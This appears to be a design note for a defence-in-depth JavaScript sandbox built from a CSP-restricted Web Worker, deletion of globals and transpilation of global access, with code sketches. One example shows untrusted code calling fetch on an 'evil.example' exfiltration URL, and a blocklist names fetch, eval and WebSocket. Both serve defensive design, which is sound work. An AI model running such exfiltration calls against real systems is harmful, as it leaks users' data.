Paranoid JS Sandbox in the browser

A design for a paranoid, secure-by-default, defense-in-depth JS sandbox.

3 different, complementary layers:

  • Web Worker with CSP blocking network requests, in a cross-domain iframe
  • everything but an allowlist is deleted from global scope in the worker and the iframe
  • transpilation & static analysis that intercepts access to globals (and calls to the Function constructor)

These are very complementary: the first layer is simple and hard for us to get wrong, but reliant on the browser not getting it wrong; the second layer is hard for the browser to get wrong, but reliant on us not getting it wrong, at runtime; the third and final layer is really hard for the browser to get wrong, but really reliant on us not to miss anything.

Furthermore, the first layer is the only one preventing the untrusted code from freezing the page by infinite looping; and the second and third layers can only clear out globals and manipulate built-in prototypes (like the Function constructor) because of the isolated realm provided by the first layer.

Limitations:

  • calls into and out of the sandbox must be async
  • only strict mode allowed, eval() is prohibited (but new Function() is allowed)
  • can't impose memory limits, and only rough time limits

Cross-domain Web Worker

Web Workers can't directly be cross-domain, so instead we make an iframe to a sandbox domain that serves a blank page; that page just launches a Web Worker, handles cross-window communication, and kills the Web Worker if it spends more than the configured CPU time without responding. Everything is deleted from global scope in the iframe too, because there's no reason to leave it lying around.
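
A minimal sketch of what that sandbox-domain page might look like (the CPU budget, message shapes, and file name here are illustrative assumptions, not part of the design):

```js
// Served from the sandbox domain with a CSP header that blocks network
// requests. The budget and message shapes below are illustrative.
const CPU_TIME_LIMIT_MS = 100;

const worker = new Worker('worker.js');
let killTimer = null;

// Relay calls from the embedding page into the worker. Wall-clock time here
// approximates CPU time, since a worker stuck in a loop never responds.
window.addEventListener('message', (e) => {
  // (real code would verify e.origin before relaying)
  worker.postMessage(e.data);
  killTimer = setTimeout(() => worker.terminate(), CPU_TIME_LIMIT_MS);
});

// Relay results back out and cancel the pending kill.
worker.onmessage = (e) => {
  clearTimeout(killTimer);
  parent.postMessage(e.data, '*'); // real code would pin the target origin
};
```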

Clearing of global scope

Before running the untrusted code, we loop over the global object and delete every global variable (saving the ones we need first, of course). The browser might not like this very much, and since it doesn't happen until runtime, it needs a bit of robustness: my current plan is to have a blocklist of known-bad globals like fetch or eval, and if any of those can't be deleted (we test whether deletion worked after each delete), we refuse to run the untrusted code at all. It's possible browsers aren't that finicky and it would work just fine to have an allowlist of globals that are allowed to be undeletable, but assuming so seems like it could hurt forwards-compatibility.
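
A sketch of what that clearing pass might look like inside the worker (the blocklist contents and names here are illustrative, not exhaustive):

```js
// Save everything we need before deleting anything, including our own
// references to intrinsics, since the global bindings go away.
const g = self; // `self` itself gets deleted, so keep our own reference
const getProto = Object.getPrototypeOf;
const getOwnNames = Object.getOwnPropertyNames;
const objectProto = Object.prototype;
const postMessageToHost = self.postMessage.bind(self);
const BLOCKLIST = ['fetch', 'eval', 'XMLHttpRequest', 'WebSocket', 'importScripts'];

// Globals like fetch live on WorkerGlobalScope.prototype, not on the global
// object itself, so walk the prototype chain (stopping before Object.prototype).
for (let obj = g; obj && obj !== objectProto; obj = getProto(obj)) {
  for (const name of getOwnNames(obj)) {
    try { delete obj[name]; } catch (_) { /* non-configurable property */ }
    // test whether deletion actually worked; refuse to run if a known-bad
    // global survived
    if (name in g && BLOCKLIST.indexOf(name) !== -1) {
      postMessageToHost({ error: 'could not delete ' + name });
      throw 'refusing to run untrusted code'; // a string: Error is deleted by now
    }
  }
}
```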

Transpilation & static analysis

During transpilation, we statically replace:

  • references to the global object with a stand-in ordinary object
  • references to global variables with property accesses on the stand-in object
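
For example, assuming the stand-in object is named _global (the name is an illustrative assumption), the transpiler might rewrite:

```js
// untrusted input:
var re = new RegExp('^a+$');               // allowlisted: works
fetch('https://evil.example/exfiltrate');  // not allowlisted

// transpiled output:
var re = new _global.RegExp('^a+$');              // _global.RegExp is the real RegExp
_global.fetch('https://evil.example/exfiltrate'); // throws TypeError: not a function
```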

The stand-in fake global object, of course, only contains allowlisted globals, specifically those in the ECMAScript spec like RegExp, isNaN, etc, plus API functions to communicate with the host. eval is of course omitted; Function is replaced by a stand-in function that runs the source text through this transpiler before passing it to the real Function constructor, which is closed over but otherwise unreferenceable (likewise GeneratorFunction etc if ES >5 is supported).
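
A sketch of that stand-in Function constructor (transpile is the transpiler described in this section; fakeGlobal and the other names are illustrative):

```js
const RealFunction = Function; // closed over; never exposed to sandboxed code

function SafeFunction(...args) {
  const body = args.length ? String(args[args.length - 1]) : '';
  const params = args.slice(0, -1).join(',');
  // run the untrusted source through the transpiler before the real constructor
  // (in ES >5, parameter lists can contain code too, so they'd also need vetting)
  return RealFunction(params, transpile('"use strict";\n' + body));
}
// so `fn instanceof Function` still behaves as expected
SafeFunction.prototype = RealFunction.prototype;

fakeGlobal.Function = SafeFunction;
```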

To mitigate timing-based side-channel attacks, we completely fake the flow of time in the sandbox: while synchronous code runs, time doesn't appear to move, and timeouts appear "exact". For example, if I call code in the sandbox at timestamp 123456000 and it runs for 25ms, even at the end the apparent current timestamp will still be 123456000; if that code set a timeout for 10ms, then the apparent current timestamp when the timeout runs will be exactly 123456010, even though the actual timestamp will be approximately 123456025.

Also, at the beginning and end of any execution (whether initiated by a call into the sandbox or by something asynchronous like a timeout), we send messages to the frame hosting the Web Worker so that it can measure approximately how much CPU time the worker has been spending, and kill it after too much.

I also think we can provide an API that exposes a smidge of timing information: assuming a default CPU time limit of 100ms, the API can return 0 when <50ms CPU time has been spent, 1 for 50-75ms, 2 for 75-87.5ms, and 3 for 87.5-100ms. This should allow tasks that want to spend the max allotted CPU time on whatever to approximately measure their speed without getting killed before they can return a useful response.
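
A sketch of the virtual clock and the coarse CPU-time API (all names here, including cpuPressure and cpuTimeSpentMs, are illustrative assumptions):

```js
let virtualNow = 0;  // set from the host's clock when a call enters the sandbox
const pending = [];  // scheduled timeouts: { at, fn }

// Time stands still while synchronous code runs.
// (A fuller stand-in would also fake `new Date()`, performance.now(), etc.)
fakeGlobal.Date = { now: () => virtualNow };

fakeGlobal.setTimeout = (fn, delay) => {
  pending.push({ at: virtualNow + delay, fn });
};

// Called by the scheduler once the earliest timer is actually due in real time:
function fireNextTimer() {
  pending.sort((a, b) => a.at - b.at);
  const timer = pending.shift();
  if (!timer) return;
  virtualNow = timer.at; // the callback sees exactly its requested timestamp
  timer.fn();
}

// The coarse CPU-time API: with a 100ms budget, returns 0 below 50ms spent,
// 1 for 50-75ms, 2 for 75-87.5ms, 3 for 87.5-100ms.
fakeGlobal.cpuPressure = () => {
  const frac = cpuTimeSpentMs() / CPU_TIME_LIMIT_MS; // reported by the host frame
  return frac < 0.5 ? 0 : frac < 0.75 ? 1 : frac < 0.875 ? 2 : 3;
};
```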

Known limitations:

  • this layer assumes that Function.prototype.constructor etc are overridden during initialization
  • this layer assumes insecure functions aren't added to built-in prototypes, a problem that ADsafe had (although strict mode would've covered most of those)
  • this layer relies on strict mode to ensure that this will be undefined in non-method function calls; I don't think any browsers support Web Workers but not strict mode, but still, this is a limitation of this layer
    • (in theory, transpilation could take care of this, such as by replacing this with _this and inserting var _this = this === window ? undefined : this at the top of every function, but I see no reason to)
  • there are other weird old browser features that would punch holes through this layer, especially SpiderMonkey extensions like .__parent__ and .caller
    • TODO elaborate on these; exhaustive list would be good too

Bug Bounty Program (eventual)

For defense-in-depth to make any sense, bounties have to be awarded for holes found in any layer, even if the other layers render them unexploitable. That includes previously-unknown limitations of the transpilation layer, for example, although the bounty will be low if it only applies to some old SpiderMonkey version. Also, the hole has to be related to our code/config: a browser bug in Web Workers probably wouldn't count, unless it's a WONTFIX, or likely to recur and easy to work around, or something along those lines.
